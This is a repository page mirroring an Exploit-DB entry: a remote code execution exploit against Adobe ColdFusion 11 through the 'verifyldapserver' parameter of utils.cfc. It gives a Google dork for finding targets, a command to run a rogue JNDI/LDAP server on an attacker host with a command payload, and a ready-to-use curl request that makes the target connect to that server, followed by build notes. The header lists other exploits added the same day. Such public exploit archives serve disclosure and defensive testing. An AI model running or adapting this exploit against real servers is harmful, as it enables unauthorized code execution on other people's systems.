bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/50781.txt
Offensive Security 7755ac3af6 DB: 2022-02-24 
9 changes to exploits/shellcodes

Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)
ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD
Simple Real Estate Portal System 1.0 - 'id' SQLi
Air Cargo Management System v1.0 - SQLi
aaPanel 6.8.21 - Directory Traversal (Authenticated)
Student Record System 1.0 - 'cid' SQLi (Authenticated)
WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)
WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)
Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)
2022-02-24 05:01:36 +00:00

42 lines
No EOL
1.6 KiB
Text
Raw Permalink Blame History

# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)
# Google Dork: intext:"adobe coldfusion 11"
# Date: 2022-22-02
# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)
# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
# Version: Adobe Coldfusion (11.0.03.292866)
# Tested on: Microsoft Windows Server & Linux
# Description:
# ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution.
# JNDI attack via the 'verifyldapserver' parameter on the utils.cfc
==================== 1.Setup rogue-jndi Server ====================
https://github.com/veracode-research/rogue-jndi
==================== 2.Preparing the Attack =======================
java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box"
==================== 3.Launch the Attack ==========================
http://REDACTED/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json
curl -i -s -k -X $'GET' \
-H $'Host: target' \
--data-binary $'\x0d\x0a\x0d\x0a' \
$'http://REDACTED//CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json'
==================== 4.RCE =======================================
Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8
Can be done by modify the pom.xml as below
<configuration>
<source>7</source>
<target>7</target>
</configuration>
Reference in a new issue View git blame Copy permalink